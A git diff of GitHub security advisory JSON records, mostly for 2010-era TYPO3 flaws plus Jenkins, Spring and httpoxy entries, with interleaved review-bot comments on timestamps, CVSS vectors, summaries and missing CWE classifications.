"WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3666" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-330" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:21:45Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json b/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json new file mode 100644 index 0000000000000..6f2790a42f241 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json 
@@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg45-qgcf-hf9x", + "modified": "2024-02-06T22:58:29Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3660" + ], + "summary": "TYPO3 is vulnerable to Cross-Site Scripting (XSS) on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows XSS on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3660" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3660" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": 
"2024-02-06T22:58:29Z", + "nvd_published_at": "2019-11-01T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json b/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json index f80a268299587..53ff3cfebced2 100644 --- a/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json +++ b/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-context" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-context" }, "ranges": [ { diff --git a/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json b/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json new file mode 100644 index 0000000000000..5ffe039198086 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json 
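Review bot: Moving the affected artifact from `org.springframework:spring-core` to `org.springframework:spring-context` changes who gets alerted, yet the diff for this file touches only the two `affected` entries and leaves the top-level `modified` timestamp untouched (compare the GHSA-q8hg change above, which bumps `modified` with its edits); OSV consumers that poll on `modified` will keep serving the old package name. Because spring-context depends on spring-core and not the reverse, a project that declares only spring-core genuinely loses this alert, which is correct only if the vulnerable code lives exclusively in spring-context — the hunk offers no reference establishing that, so the commit message or a new `references` entry should say where the fix landed.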
@@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gqmh-5xmq-3fhg", + "modified": "2024-02-07T21:28:51Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3671" + ], + "summary": "TYPO3 is vulnerable to Session Fixation", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 is open to a session fixation attack which allows remote attackers to hijack a victim's session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3671" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/199cc2d53747d76657d7aab612c6b3f728d0f15d" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/1d649976e1f1bda684cdc7120e9f74a543059181" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/d3577c8e2c49122c4ab5955c70688ee441d06f23" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ef3676281b0346644041a93fcbaa7bd9844bbbc5" + 
}, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3671" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Broken_Authentication_and_Session_Management" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:28:51Z", + "nvd_published_at": "2019-11-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json b/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json new file mode 100644 index 0000000000000..cb2e46b9e4be0 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json 
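Review bot: The vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N` scores this CWE-384 session fixation with `UI:N`, but a fixation attack only succeeds once the victim authenticates using the attacker-supplied session identifier, which CVSS 3.1 treats as user interaction; unless the score was deliberately copied from an upstream source, change it to `UI:R`. The `details` sentence "is open to a session fixation attack which allows remote attackers to hijack a victim's session" also never says whether the fixation is in the frontend, the backend, or the Install Tool, which is exactly what decides whether `typo3/cms-install` is the right affected package; the four referenced TYPO3 commits should settle that, and the summary could then name the component.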
@@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j628-384g-rmgc", + "modified": "2024-02-06T23:03:14Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3661" + ], + "summary": "TYPO3 Open Redirection vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Open Redirection on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3661" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3661" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Open_Redirection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + 
"github_reviewed_at": "2024-02-06T23:03:14Z", + "nvd_published_at": "2019-11-01T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json b/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json deleted file mode 100644 index f4a860ef80ea0..0000000000000 --- a/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json +++ /dev/null 
@@ -1,342 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m6ch-gg5f-wxx3", - "modified": "2022-04-07T13:59:22Z", - "published": "2022-04-07T13:59:22Z", - "aliases": [ - "CVE-2016-5385" - ], - "summary": "HTTP Proxy header vulnerability", - "details": "PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an \"httpoxy\" issue.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "6" - }, - { - "fixed": "6.2.1" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "4.0.0-rc2" - }, - { - "fixed": "4.2.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "5" - }, - { - "fixed": "5.3.1" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "drupal/core" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "8.0" - }, - { - "fixed": "8.1.7" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "bugsnag/bugsnag-laravel" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "2.0.2" - } - ] - } - ] - }, - { - "package": { - "ecosystem": 
"Packagist", - "name": "amphp/artax" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.0.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "amphp/artax" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "padraic/humbug_get_contents" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.1.2" - } - ] - } - ] - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5385" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/pull/143" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/pull/145" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/pull/23" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/pull/23/commits/848e8c282a863654e76bd958acfb57c81cb739b5" - }, - { - "type": "WEB", - "url": "https://github.com/amphp/artax/commit/81254742812a5a9adf4b085f543f3f21daedcd97" - }, - { - "type": "WEB", - "url": "https://github.com/amphp/artax/commit/b60cf493c9e577a3678865f620b1eb61ab3d7ca9" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1353794" - }, - { - "type": "WEB", - "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/guzzle/CVE-2016-5385.yaml" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/releases/tag/v2.0.2" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/4.x/CHANGELOG.md#424-2016-07-18" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/5.3/CHANGELOG.md#531---2016-07-18" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/master/CHANGELOG.md#622---2016-10-08" - 
}, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/releases/tag/6.2.1" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/releases/tag/1.1.2" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03770en_us" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05320149" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05333297" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7RMYXAVNYL2MOBJTFATE73TOVOEZYC5R/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GXFEIMZPSVGZQQAYIQ7U7DFVX3IBSDLF/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KZOIUYZDBWNDDHC6XTOLZYRMRXZWTJCP/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7RMYXAVNYL2MOBJTFATE73TOVOEZYC5R/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GXFEIMZPSVGZQQAYIQ7U7DFVX3IBSDLF/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KZOIUYZDBWNDDHC6XTOLZYRMRXZWTJCP/" - }, - { - "type": "WEB", - "url": "https://security.gentoo.org/glsa/201611-22" - }, - { - "type": "WEB", - "url": "https://www.drupal.org/SA-CORE-2016-003" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2016-08/msg00003.html" - }, - { - "type": "WEB", - "url": 
"http://rhn.redhat.com/errata/RHSA-2016-1609.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1610.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1611.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1612.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1613.html" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2016/dsa-3631" - }, - { - "type": "WEB", - "url": "http://www.kb.cert.org/vuls/id/797896" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/91821" - }, - { - "type": "WEB", - "url": "http://www.securitytracker.com/id/1036335" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-601" - ], - "severity": "HIGH", - "github_reviewed": true, - "github_reviewed_at": "2022-04-07T13:59:22Z", - "nvd_published_at": "2016-07-19T02:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json b/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json new file mode 100644 index 0000000000000..24429beac4e23 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json 
@@ -0,0 +1,100 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p78x-93mq-qwqh", + "modified": "2024-02-06T20:56:16Z", + "published": "2022-04-21T01:57:48Z", + "aliases": [ + "CVE-2010-3672" + ], + "summary": "TYPO3 vulnerable to Cross-Site Scripting in the textarea view helper ", + "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 allows XSS in the textarea view helper in an extbase extension.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-fluid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-fluid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3672" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5f13c2276c8b753ceb76b31d1034a47c781d302a" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/fc2b43503d871b42c0e0094ea55756c089b536ea" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3-CMS/fluid/blob/cbce111326850c247729f097b2d1fb735e513906/Classes/ViewHelpers/Form/TextareaViewHelper.php" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3672" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:56:16Z", + "nvd_published_at": 
"2019-11-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json b/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json new file mode 100644 index 0000000000000..bbb6d7046e2c8 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json 
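Review bot: The `summary` string carries a trailing space, `"TYPO3 vulnerable to Cross-Site Scripting in the textarea view helper "`, which no other summary in this commit has and which renders as a visible gap in consumers that print the title inline; the line should read `"summary": "TYPO3 vulnerable to Cross-Site Scripting in the textarea view helper",`. Separately, the first range starts at `"introduced": "0"` while the details text only names TYPO3 before 4.3.4; that is harmless if `typo3/cms-fluid` has no releases below the 4.3 line, but the lower bound is worth confirming rather than defaulting to 0. This hunk begins on the previous line.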
@@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pchp-c5w8-47gc", + "modified": "2024-01-30T21:09:35Z", + "published": "2022-04-23T00:40:48Z", + "aliases": [ + "CVE-2012-0785" + ], + "summary": "Hash collision attack vulnerability in Jenkins", + "details": "Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka \"the Hash DoS attack.\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.425" + }, + { + "fixed": "1.447" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.424.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/cve-2012-0785" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2012-01-12/" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2012-0785" + }, + { + "type": "WEB", + "url": "https://www.cloudbees.com/jenkins-security-advisory-2012-01-12" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/01/20/8" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:09:35Z", + "nvd_published_at": "2020-02-24T17:15:00Z" + } +} \ No newline at end of file 
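Review bot: `cwe_ids` is an empty array although the details describe a hash-collision CPU-exhaustion denial of service, so this entry cannot be grouped with other resource-consumption issues by weakness class. A curator should classify it before publication; CWE-400 (uncontrolled resource consumption) or CWE-407 (inefficient algorithmic complexity) are the usual candidates for this class, to be confirmed against the upstream Jenkins advisory. The serialized form `"cwe_ids": [` followed by an empty added line and `],` also differs from every populated list in this commit, which makes the empty case easy to miss on review.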
diff --git a/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json b/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json new file mode 100644 index 0000000000000..6f3eab8f6fe0c --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json 
@@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjpc-gjf7-9938", + "modified": "2024-02-06T23:03:54Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3663" + ], + "summary": "TYPO3 Arbitrary Code Execution vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains an insecure default value of the variable fileDenyPattern which could allow remote attackers to execute arbitrary code on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3663" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3663" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Arbitrary_Code_Execution" + } + ], + 
"database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-06T23:03:54Z",
+ "nvd_published_at": "2019-11-04T22:15:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json b/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json
index 9695bd0b36d2a..32784155ce541 100644
--- a/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json
+++ b/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json
@@ -52,6 +52,14 @@
 "type": "WEB",
 "url": "https://github.com/dompdf/dompdf/commit/4c70e1025bcd9b7694b95dd552499bd83cd6141d"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2022-28368.yaml"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://github.com/advisories/GHSA-x752-qjv4-c4hc"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/dompdf/dompdf"
diff --git a/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json b/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json
index fa7b82421fa85..b365b6fd149b0 100644
--- a/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json
+++ b/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-22pv-7v9j-hqxp",
- "modified": "2023-08-17T22:51:04Z",
+ "modified": "2024-02-08T19:46:34Z",
 "published": "2022-05-05T00:29:17Z",
 "aliases": [
 "CVE-2013-4752"
